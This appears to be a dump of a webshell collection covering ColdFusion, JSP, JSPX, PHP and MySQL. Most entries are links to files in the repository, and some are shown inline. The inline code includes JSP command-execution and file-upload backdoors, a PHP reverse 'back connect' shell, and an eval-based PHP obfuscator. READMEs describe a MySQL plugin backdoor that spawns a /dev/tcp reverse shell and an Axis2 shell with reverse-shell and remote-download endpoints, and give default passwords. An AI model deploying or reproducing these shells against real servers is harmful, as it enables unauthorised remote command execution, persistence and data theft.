27 | 
    28 | #myVar#
29 | 
    
30 |     
31 | 
32 | 


--------------------------------------------------------------------------------
/Cfm/cmfshell.cmf:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | H4x0r's cfmshell
 5 | 
 6 | 
 7 | 
 8 | 
 9 | #cmd#
10 | 
14 | 
15 | 
16 | 
    
17 | 
18 | 
19 | 
    
20 | 
21 | 
24 | 
27 | 
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/Cfm/devshell.cfm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Cfm/devshell.cfm


--------------------------------------------------------------------------------
/Cfm/devshell.md:
--------------------------------------------------------------------------------
1 | 密码:adobe123 使用方式:http://url/test.cfm?o=login


--------------------------------------------------------------------------------
/Cfm/list.cfm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Cfm/list.cfm


--------------------------------------------------------------------------------
/Cfm/mycode12.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | CFM shell
 6 | 
 7 | 
 8 | 
 9 | 
10 |     #cmd#
11 |     
15 |     
16 | 
17 | 
    
18 | 
19 | 
20 | 
    
21 | 
22 |   
25 | 
28 |     
30 | 
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/Cfm/xl.cfm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Cfm/xl.cfm


--------------------------------------------------------------------------------
/Javascript/README.md:
--------------------------------------------------------------------------------
1 | # Javascript-Backdoor
2 | Learn from  Casey Smith @subTee
3 | https://gist.github.com/subTee/f1603fa5c15d5f8825c0
4 | 


--------------------------------------------------------------------------------
/Jsp/Command Execution (win32).jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*,java.net.*"%>
 2 | <%
 3 | //
 4 | // JSP_KIT
 5 | //
 6 | // cmd.jsp = Command Execution (win32)
 7 | //
 8 | // by: Unknown
 9 | // modified: 27/06/2003
10 | //
11 | %>
12 | 
13 | 
    
14 | 
15 | 
16 | 
    
17 | 
    18 | <%
19 | if (request.getParameter("cmd") != null) {
20 |         out.println("Command: " + request.getParameter("cmd") + "\n
    ");
21 |         Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
22 |         OutputStream os = p.getOutputStream();
23 |         InputStream in = p.getInputStream();
24 |         DataInputStream dis = new DataInputStream(in);
25 |         String disr = dis.readLine();
26 |         while ( disr != null ) {
27 |                 out.println(disr); disr = dis.readLine(); }
28 |         }
29 | %>
30 | 
    
31 | 
32 | 


--------------------------------------------------------------------------------
/Jsp/GetShell.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | jsp-yzmm
 5 | 
 6 | 
12 | 
34 | 
35 | 
    
36 |   
      
37 |     URL:  
38 |     FileName:  
39 |     Upload
    
40 |     
41 |   
    
42 | 
    
43 | 
44 | 
45 | 


--------------------------------------------------------------------------------
/Jsp/JFoler 1.0.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/JFoler 1.0.jsp


--------------------------------------------------------------------------------
/Jsp/JSP Shell 岁月联盟专用版本.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/JSP Shell 岁月联盟专用版本.jsp


--------------------------------------------------------------------------------
/Jsp/JspDo Code By Xiao.3.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/JspDo Code By Xiao.3.jsp


--------------------------------------------------------------------------------
/Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp


--------------------------------------------------------------------------------
/Jsp/Jsp反弹shell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/Jsp反弹shell.txt


--------------------------------------------------------------------------------
/Jsp/Mysql Database.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/Mysql Database.jsp


--------------------------------------------------------------------------------
/Jsp/Silic Group.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/Silic Group.jsp


--------------------------------------------------------------------------------
/Jsp/cmdjsp.jsp:
--------------------------------------------------------------------------------
 1 | // note that linux = cmd and windows = "cmd.exe /c + cmd" 
 2 | 
 3 | 
    
 4 | 
 5 | 
 6 | 
    
 7 | 
 8 | <%@ page import="java.io.*" %>
 9 | <%
10 |    String cmd = request.getParameter("cmd");
11 |    String output = "";
12 | 
13 |    if(cmd != null) {
14 |       String s = null;
15 |       try {
16 |          Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
17 |          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
18 |          while((s = sI.readLine()) != null) {
19 |             output += s;
20 |          }
21 |       }
22 |       catch(IOException e) {
23 |          e.printStackTrace();
24 |       }
25 |    }
26 | %>
27 | 
28 | 
    29 | <%=output %>
30 | 
    
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/Jsp/jshell ver 0.1.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/jshell ver 0.1.jsp


--------------------------------------------------------------------------------
/Jsp/jshell ver 1.0.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/jshell ver 1.0.jsp


--------------------------------------------------------------------------------
/Jsp/jspspy_k8.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Jsp/jspspy_k8.jsp


--------------------------------------------------------------------------------
/Jsp/logger小马.jsp:
--------------------------------------------------------------------------------
1 | <%java.util.logging.Logger l=java.util.logging.Logger.getLogger("t");java.util.logging.FileHandler h=new java.util.logging.FileHandler(pageContext.getServletContext().getRealPath("/")+request.getParameter("f"),true);h.setFormatter(new java.util.logging.SimpleFormatter());l.addHandler(h);l.info(request.getParameter("t"));%>
2 | 


--------------------------------------------------------------------------------
/Jsp/上传小马.jsp:
--------------------------------------------------------------------------------
1 | <%@ page language="java" pageEncoding="gbk"%><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%>
    " name="url">
        
42 |     
        
43 |     
        
44 |         
45 |     
        
46 |       
47 |    
48 | 


--------------------------------------------------------------------------------
/Jsp/新型JSP小马支持上传任意格式文件.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>


--------------------------------------------------------------------------------
/Jspx/base64.jspx:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | ");
17 | 			brs = br.readLine();
18 | 		}
19 | 		}catch(Exception ex){
20 | 			out.println(ex.toString());
21 | 		}
22 | 	}]]>
23 | 
24 | 


--------------------------------------------------------------------------------
/Jspx/base64.md:
--------------------------------------------------------------------------------
1 | Author:Ends  
2 | site:http://ends.cc/?p=165
3 | 
4 |     demo:http://ends.cc/webshell/base64.jspx?str=base64(cmd)
5 |          http://ends.cc/webshell/base64.jspx?str=d2hvYW1p (d2hvYW1p == base64(whoami))


--------------------------------------------------------------------------------
/Jspx/cmd.jpg:
--------------------------------------------------------------------------------
 1 | JPG
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | ");
18 | 			brs = br.readLine();
19 | 		}
20 | 		}catch(Exception ex){
21 | 			out.println(ex.toString());
22 | 		}
23 | 	}]]>
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/Jspx/cmd.jspx:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | ");
17 | 			brs = br.readLine();
18 | 		}
19 | 		}catch(Exception ex){
20 | 			out.println(ex.toString());
21 | 		}
22 | 	}]]>
23 | 
24 | 


--------------------------------------------------------------------------------
/Jspx/paxmac.jspx:
--------------------------------------------------------------------------------
 1 | 
 4 |     
 5 |     
 6 | 
 7 |     
 8 |         
 9 |             jspx
10 |         
11 |         
12 |             
13 |                try {
14 | 		String cmd = request.getParameter("paxmac");
15 | 		if (cmd !=null){
16 | 			Process child = Runtime.getRuntime().exec(cmd);
17 | 			InputStream in = child.getInputStream();
18 | 			int c;
19 | 			while ((c = in.read()) != -1) {
20 | 			out.print((char)c);
21 | 			}
22 | 			in.close();
23 | 			try {
24 | 			child.waitFor();
25 | 			} catch (InterruptedException e) {
26 | 			e.printStackTrace();
27 | 		}
28 | 		}
29 | 		} catch (IOException e) {
30 | 		System.err.println(e);
31 | 		}
32 |             
33 |         
34 |     
35 | 
36 | 


--------------------------------------------------------------------------------
/Mysql/mysql_audit_plugin/README.md:
--------------------------------------------------------------------------------
 1 | ####A tricked mysql audit plugin backdoor
 2 | 
 3 | Modified from 'audit_null.c' for official MySQL releases.
 4 | 
 5 | by t57root @ openwill.me 
 6 | 
 7 | <t57root@gmail.com>  [www.HackShell.net](http://www.hackshell.net/)
 8 | 
 9 | This plugin watches the queries on the mysql server and will execute the shell command 'bash < /dev/tcp/$BACK_IP/$BACK_PORT >&0 2>&0 &' when there's specific string in the running query so we can get shell access with a reverse connection.
10 | 
11 | * Compile:
12 | 
13 | >>gcc -o audit_null.so audit_null.c \`mysql_config --cflags\` -shared -fPIC -DMYSQL_DYNAMIC_PLUGIN 
14 | 
15 | * Install:
16 | 
17 | >>\#cp audit_null.so /usr/lib/mysql/plugin/
18 | 
19 | >>mysql>install plugin NULL_AUDIT soname 'audit_null.so';
20 | 
21 | * Usage:
22 | 
23 | >>mysql>select * from news where id='openwill.me';
24 | 
25 | >>OR
26 | 
27 | >>http://www.hackshell.net/news.php?id='openwill.me'
28 | 
29 | More details available at [This link](http://example.net/)
30 | 


--------------------------------------------------------------------------------
/Nginx/pwnginx-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Nginx/pwnginx-master.zip


--------------------------------------------------------------------------------
/Other/Axis2Shell/README.md:
--------------------------------------------------------------------------------
 1 | axis2
 2 | =========
 3 | 
 4 | axis2 web shell  
 5 | author : Svti  
 6 | url : https://github.com/Svti/Axis2Shell  
 7 | 
 8 | 使用介绍:  
 9 | 
10 | 1、命令执行  
11 | http://1.1.1.1/services/config/exec?cmd=whoami  
12 | (不说了,执行命令。注意:xml换行没有处理好)  
13 | 
14 | 2、反弹shell  
15 | http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555  
16 | (Linux则使用bash反弹shell,Windows则会进行socket执行shell)  
17 | 
18 | 3、文件上传  
19 | http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp  
20 | (会把resource目录下面的one.txt 写成shell.jsp,注意:全路径,带*文件名)  
21 | 
22 | 4、文件下载  
23 | http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp  
24 | (会把这个URL的文件写成shell.jsp,注意:全路径,带*文件名)  
25 | 
26 | 
27 | 5、class目录查看  
28 | http://1.1.1.1/services/config/getClassPath  
29 | (会显示当前class的路径,方便文件上传)  
30 | 
31 | ps:  
32 | 趁周末休息,看了几个国外的机器有 axis的 项目,特地去找了@园长的Cat.aar工具,发现真心不好使。  
33 | 
34 | 1、反弹shell 鸡肋,好多错误 ,ls / 都不行。   
35 | 
36 | 2、没有文件上传功能。这个对于一个渗透着来说很重要  
37 | 
38 | 于是自己写了个,希望大家喜欢。  
39 | 
40 | 源码已经上github https://github.com/Svti/Axis2Shell  
41 | 
42 | aar 文件 https://github.com/Svti/Axis2Shell/blob/master/config.aar  也在github上面,还有什么问题,可以在下面评论   
43 | 
44 | 
45 | 注意:   
46 | 
47 | 1、相同文件名的aar文件只能上传一次,虽说是remove Service了,服务器上面的还在。想要继续使用,请rename   
48 | 
49 | 2、默认的jsp一句话木马是/resource/one.txt,可以自己修改。默认密码是wooyun,发布版本里面放的是one.jsp,一向鄙视伸手党  
50 | 3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件,当shell断开后会自动删除  
51 | 
52 | 


--------------------------------------------------------------------------------
/Other/Axis2Shell/config.aar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/Axis2Shell/config.aar


--------------------------------------------------------------------------------
/Other/File include Bypass/includer.php:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Other/File include Bypass/litteryi.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/File include Bypass/litteryi.txt


--------------------------------------------------------------------------------
/Other/File include Bypass/litteryixx.ASP:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Other/acat/ACat-src.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/acat/ACat-src.zip


--------------------------------------------------------------------------------
/Other/acat/ACat-附数据库驱动-jdk1.5.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/acat/ACat-附数据库驱动-jdk1.5.jar


--------------------------------------------------------------------------------
/Other/acat/ACat-附数据库驱动.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/acat/ACat-附数据库驱动.jar


--------------------------------------------------------------------------------
/Other/acat/ACat.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/acat/ACat.jar


--------------------------------------------------------------------------------
/Other/acat/ACat_jdk1.5.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/acat/ACat_jdk1.5.jar


--------------------------------------------------------------------------------
/Other/acat/readme.md:
--------------------------------------------------------------------------------
 1 | Author:园长MM
 2 | 
 3 | 
 4 | 下载:
 5 | ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar、 ACat-jdk.1.7.jar、ACat-附数据库驱动.jar
 6 | 
 7 | 源码:
 8 | ACat-src.zip
 9 | 
10 | 描述:
11 | 
12 | 这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个servlet的api,不过已实现了后门相关的其他功能。启动成功后会开启9527端口,然后访问:http://xxx.com:9527/api.jsp,密码:023。
13 | 
14 | 停止服务:http://xxx.com:9527/api.jsp?action=stop
15 | 
16 | 密码和端口配置在jar里面的server.properties:
17 | 
18 | 
19 | 
20 | 运行方式:java -jar ACat.jar或者在jsp里面调用。
21 | 
22 | 
23 | 
24 | 如果需要连接数据库需要下载:ACat-附数据库驱动.jar,或者自行添加相关jar。


--------------------------------------------------------------------------------
/Other/cat.aar/Readme.md:
--------------------------------------------------------------------------------
1 | #axis2 利用小工具cat.aar  
2 | 
3 | Author:园长  
4 | 文章url:http://p2j.cn/?p=1548  
5 | [下载文章的pdf](https://raw.githubusercontent.com/tennc/webshell/master/other/cat.aar/axis2%20%E5%88%A9%E7%94%A8%E5%B0%8F%E5%B7%A5%E5%85%B7cat.pdf)
6 | 


--------------------------------------------------------------------------------
/Other/cat.aar/axis2 利用小工具cat.aar.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/cat.aar/axis2 利用小工具cat.aar.zip


--------------------------------------------------------------------------------
/Other/cat.aar/axis2 利用小工具cat.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/cat.aar/axis2 利用小工具cat.pdf


--------------------------------------------------------------------------------
/Other/jdk1.3webshell/readme.MD:
--------------------------------------------------------------------------------
1 | jdk 1.3 tomcat 7测试通过  
2 | 
3 | jdk 1.3 weblogic 8测试通过  
4 | 
5 | 只完成基本的文件操作功能(文件浏览,上传、下载、删除、编辑)和命令执行  
6 | 
7 | [site](http://www.shack2.org/article/1415181383.html)


--------------------------------------------------------------------------------
/Other/jdk1.3webshell/test.ear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/jdk1.3webshell/test.ear


--------------------------------------------------------------------------------
/Other/jdk1.3webshell/test.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/jdk1.3webshell/test.war


--------------------------------------------------------------------------------
/Other/reGeorg-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Other/reGeorg-master.zip


--------------------------------------------------------------------------------
/Php/529.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/529.php


--------------------------------------------------------------------------------
/Php/AK-74 Security Team Web Shell Beta Version.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/AK-74 Security Team Web Shell Beta Version.php


--------------------------------------------------------------------------------
/Php/AK-74 Security Team.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/AK-74 Security Team.php


--------------------------------------------------------------------------------
/Php/Antichat Shell. Modified by Go0o$E.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Antichat Shell. Modified by Go0o$E.php


--------------------------------------------------------------------------------
/Php/Antichat Socks5 Server v 1.0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Antichat Socks5 Server v 1.0.php


--------------------------------------------------------------------------------
/Php/AventGrup-Sincap 1.0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/AventGrup-Sincap 1.0.php


--------------------------------------------------------------------------------
/Php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php


--------------------------------------------------------------------------------
/Php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt


--------------------------------------------------------------------------------
/Php/B374k Beta ShElL V1.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/B374k Beta ShElL V1.php


--------------------------------------------------------------------------------
/Php/BLaSTER.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/BLaSTER.php


--------------------------------------------------------------------------------
/Php/Back Connect.php:
--------------------------------------------------------------------------------
 1 | Back Connect' );
 3 | 
 4 | echo "
    Php Back Connect
     
 5 |             Usage: nc -vv -l -p 21
    
 6 |             
     
 7 |             

     
 8 |             Your IP & Port:
     
 9 |             
10 |             

     
11 |             

    
12 |             
    
13 |             
    "; 
14 |             
15 |          $ipim=$_POST['ipim']; 
16 |          $portum=$_POST['portum']; 
17 |          if ($ipim <> "") 
18 |          { 
19 |          $mucx=fsockopen($ipim , $portum , $errno, $errstr ); 
20 |          if (!$mucx){ 
21 |                $result = "Error: didnt connect !!!"; 
22 |          } 
23 |          else { 
24 |          
25 |          $zamazing0="\n";
26 |                   
27 |          fputs ($mucx ,"\ng0t a shell.\n\n");
28 |          fputs($mucx , system("uname -a") .$zamazing0 );
29 |          fputs($mucx , system("pwd") .$zamazing0 );
30 |          fputs($mucx , system("id") .$zamazing0.$zamazing0 );
31 |          while(!feof($mucx)){  
32 |        fputs ($mucx); 
33 |        $one="[$";
34 |        $two="]";
35 |        $result= fgets ($mucx, 8192); 
36 |       $message=`$result`; 
37 |        fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n"); 
38 |       } 
39 |       fclose ($mucx); 
40 |          } 
41 |          } 
42 | 
43 | ?>
44 | 
45 | 


--------------------------------------------------------------------------------
/Php/Backdoor php v0.1 Coded By Charlichaplin.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Backdoor php v0.1 Coded By Charlichaplin.php


--------------------------------------------------------------------------------
/Php/CasuS 1.5.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/CasuS 1.5.php


--------------------------------------------------------------------------------
/Php/Changing CHMOD Permissions Exploit.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Changing CHMOD Permissions Exploit.php


--------------------------------------------------------------------------------
/Php/Confusion to encrypt php webshell.php:
--------------------------------------------------------------------------------
 1 | = 1 !\r\n";
23 | 		exit;
24 | 	}
25 | 	$source = $argv[1];
26 | 	$output = $argv[3];
27 | 	$source = php_strip_whitespace($source);
28 | 	$source = trim(trim(trim($source, '');
29 | 	
30 | 	$shellcode = '$code';
31 | 	for ($i = 0; $i < $argv[2]; ++$i) {
32 | 		$source = base64_encode($source);
33 | 		$shellcode = 'base64_decode('.$shellcode.')';
34 | 	}
35 | 	
36 | 	$shellcode = 'preg_replace(base64_decode(\'L2EvZQ==\'),base64_decode(\''.base64_encode('eval('.$shellcode.')').'\'),\'a\')';
37 | 	$shellcode = '';
38 | 	
39 | 	fwrite(fopen($output, 'w'), $shellcode);
40 | 	echo "\r\nSuccess!\r\n"
41 | ?>
42 | 


--------------------------------------------------------------------------------
/Php/CrystalShell v.1.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/CrystalShell v.1.php


--------------------------------------------------------------------------------
/Php/Cyber Shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Cyber Shell.php


--------------------------------------------------------------------------------
/Php/Deface Keeper 0.2.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Deface Keeper 0.2.php


--------------------------------------------------------------------------------
/Php/Dx.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Dx.php


--------------------------------------------------------------------------------
/Php/EgY_SpIdEr ShElL V2.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/EgY_SpIdEr ShElL V2.php


--------------------------------------------------------------------------------
/Php/FaTaL Shell v1.0 - Edited By KingDefacer.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/FaTaL Shell v1.0 - Edited By KingDefacer.php


--------------------------------------------------------------------------------
/Php/GFS web-shell ver 3.1.7 - PRiV8.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/GFS web-shell ver 3.1.7 - PRiV8.php


--------------------------------------------------------------------------------
/Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php


--------------------------------------------------------------------------------
/Php/KA_uShell 0.1.6.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/KA_uShell 0.1.6.php


--------------------------------------------------------------------------------
/Php/KAdot Universal Shell v0.1.6.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/KAdot Universal Shell v0.1.6.php


--------------------------------------------------------------------------------
/Php/KAdot_Universal_Shell_v0.1.6.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/KAdot_Universal_Shell_v0.1.6.php


--------------------------------------------------------------------------------
/Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php


--------------------------------------------------------------------------------
/Php/Loader'z WEB Shell v 0.1.0.2.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Loader'z WEB Shell v 0.1.0.2.php


--------------------------------------------------------------------------------
/Php/Loaderz WEB Shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Loaderz WEB Shell.php


--------------------------------------------------------------------------------
/Php/Micro_Webshell.php:
--------------------------------------------------------------------------------
1 | 
>$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_;
 4 | $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
 5 | $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
 6 | $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
 7 | $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
 8 | $_=$ 
 9 | $_[$__+ $__] ;$_[@-_]($_[@!+_] );
10 |  
11 | ?> 


--------------------------------------------------------------------------------
/Php/PH Vayv.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PH Vayv.php


--------------------------------------------------------------------------------
/Php/PHANTASMA.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHANTASMA.php


--------------------------------------------------------------------------------
/Php/PHP Web Shell by oTTo.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHP Web Shell by oTTo.php


--------------------------------------------------------------------------------
/Php/PHP 搜索可读可写目录脚本.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHP 搜索可读可写目录脚本.php


--------------------------------------------------------------------------------
/Php/PHP-Shell-Detector-master.zip:
--------------------------------------------------------------------------------
